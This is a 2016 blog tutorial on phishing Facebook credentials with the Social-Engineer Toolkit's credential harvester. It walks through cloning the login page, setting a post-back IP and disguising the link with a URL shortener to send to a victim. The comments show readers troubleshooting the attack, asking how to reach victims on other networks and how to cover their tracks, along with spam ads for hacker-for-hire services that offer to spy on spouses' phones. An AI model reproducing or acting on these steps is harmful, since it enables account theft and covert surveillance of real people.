Saturday, August 13, 2016

How to hack facebook using kali linux : CREDENTIALS HARVESTER ATTACK

Do you know ,you can hack facebook password with one fake fb page(phishing).

In this tutorial we will use Social Engineering tool i.e Credential Harvester attack in kali linux.
All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.




WHAT IS CREDENTIALS HARVESTER ATTACK ?

It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.


LET'S DO THIS!!!!!!!!!

Follow this video..........



STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    
                    root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

                '1' (Social Engineering Attacks) then  
                '2'(Website Attack Vectors) then
                '3'(Credential Harvester Attack) then

5. Type '2' (Site cloner)

          set:webattack> IP address for the post back in harvesting:192.168.x.xxx (your ip address)
          
          set:webattack>Enter the url to clone: www.fb.com

    
6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 


More Detailed Guides

If there's something that isn't clear then there's a 3 post series which covers this method in detail-

  1. Setting up the background - How Not To Hack Facebook (light read, no technical content, optional)
  2. Performing the attack on LAN - Hack Facebook via Social Engineering - Credential Harvestor attack
  3. Performing the attack on the internet - Port Forwarding and use of public IP to extent attack outside your LAN

40 comments:

  1. completed all the steps, not able to get details in harvester file

    ReplyDelete
    Replies
    1. It only works when you are in the Same Local Netwok -.-

      Delete
    2. You should use your external IP and open port 80 on your modem/router for your internal IP.

      Delete
    3. how to send the clone website to my victim

      Delete
    4. How to send the clone website to my victim

      Delete
  2. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
  3. hi can anyone help im using VirtualBox and its using lan when i type ifconfig it dosnt give me ip adress it give me ipv4

    ReplyDelete
    Replies
    1. your using a usb for your wifi?
      Kali linux doesn't pickup your onboard network card if your using a VM box

      Delete
    2. sudo ifconfig

      Delete
    3. You really shouldn't be using a VM to do network related stuff. Either run a live CD/USB/whatever or install Kali.

      Delete
  4. But this only works for people on the same network, correct?

    ReplyDelete
    Replies
    1. Redirect the 80 port to your machine

      Delete
    2. yes on same network users

      Delete
  5. The url doesn't work for me the next day. Could someone Help me pls

    ReplyDelete
  6. How do i stop this (apache etc) after snatching the credentials and want to disappear?

    ReplyDelete
  7. after i did all steps the site cant be reached

    ReplyDelete
  8. It would be great if u make a tutorial on hacking instagram :p.

    ReplyDelete
  9. Article is nice and working for me.for hacking facebook using brute force attack follow below link it may hack every facebook account

    http://www.kalilinuxdojo.com/2015/11/hack-facebook-using-python-script-via-brute-force-attack.html

    ReplyDelete
  10. what's mean "Shorten your ip address with tinyurl.com ". please. explain clearly?

    ReplyDelete
    Replies
    1. Shorten means nothing but hiding your IP behind an URL!

      Delete
    2. how to shorten the ip address explain it

      Delete
  11. How do you use it on people without them being on the same network?

    ReplyDelete
  12. Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
    Replies
    1. tambem estou com esse erro

      Delete
  13. MY IP VERSION IS6 AND TINYURL IS MAKING TROUBLE

    ReplyDelete
  14. getting this error how to fix it- Something went wrong, printing the error: zipimporter() argument 1 must be string, not function

    ReplyDelete
  15. hack into public hot spot then get fb credentials

    ReplyDelete
  16. the website thus created for fishing only works in the same computer from where the process is done.if i send that fishing page to any others mail it doesnt open up. can u help me hacking a persons id who a state away?

    ReplyDelete
  17. How to shorten the IP to tiny URL?pls help me

    ReplyDelete
  18. Hello everyone! If you require the service of a professional hacker to help track your partner's cell phone remotely, contact deadlyhacker01@gmail.com, he helped me hack my husband's phone without physical contact.
    Tell him Stacey referred you, he'd help

    ReplyDelete

  19. Hi, everyone it has come to my knowledge how difficult it is to come across someone so legit for this job, I basically think we don’t need to face any more lies and deceit from our spouse, long time i was fooled around but right now as far as I’m concerned about this job, universalhacker99@gmail.com he’s ] real.
    he saved me from the lies of my cheating fiance, he deals on any type of hack such as gmail, Facebook, whatsapp, mobile phone, Skype, websites, upgrading scores, database, software testing, password sniffing, Cpanels, mystery shopper, SQL DB penetration, lease penetration and lots more, Mail him if you got any issue, he would definitely get it done with the quickest time frame.

    ReplyDelete
  20. This method wont work against HTTPS, exmple chrome user, it will always HTTPS and there will be a notice if it is not safe.

    ReplyDelete
  21. It only work in same network connection can't access external users

    ReplyDelete
  22. please tell me how to reset this attack

    ReplyDelete
  23. hi,
    I get this error
    "[!] Something went wrong, printing the error: zipimporter() argument 1 must be string, not function"

    can anyone please help.

    thanks

    ReplyDelete
  24. the clone webpage comes in my regional language (hindi) when I or anyone visit the clone webpage. It looks like a fake page, what should i do to make it in english

    ReplyDelete
  25. I really don’t know much about this scam thing and at the same time , no one wants to be on the losing side . But i just came across a good hacker who helped me hack my boyfriends text messages, whatsap, Facebook , Instagram messages remotely..You don’t have to touch his phone while you have access to his conversations through the software he bought and install remotely on my phone , i dont know how he did this but i think he's perfect at it.....contact him at hotcyberclown@gmail.com..Tell him Sarah referred you, then you can thank me later. God Bless.

    ReplyDelete
  26. Should you ever require the services of a hacker, i implore you to try your very best to hire only professionals. hackintechnology@gmail.com will increase your chances of getting your job completed. i was able to hire the services of an elite, asides the fact that i was provided a permanent solution to the service he rendered me but he gave a very efficient customer experience. he carried me along with every process and didnt leave me in the dark. contact him via email/phone hackintechnology@gmail.com

    ReplyDelete

© Kali Tutorials, 2016. Unauthorized use and/or duplication of this material without express and written permission from this site’s author and/or owner is strictly prohibited. Excerpts and links may be used, provided that full and clear credit is given to Shashwat Chaudhary and Kali Tutorials with appropriate and specific direction to the original content.
Bitcoin: 1B5aLqJcMW7zznffTxQwta8JTZsxBDPguC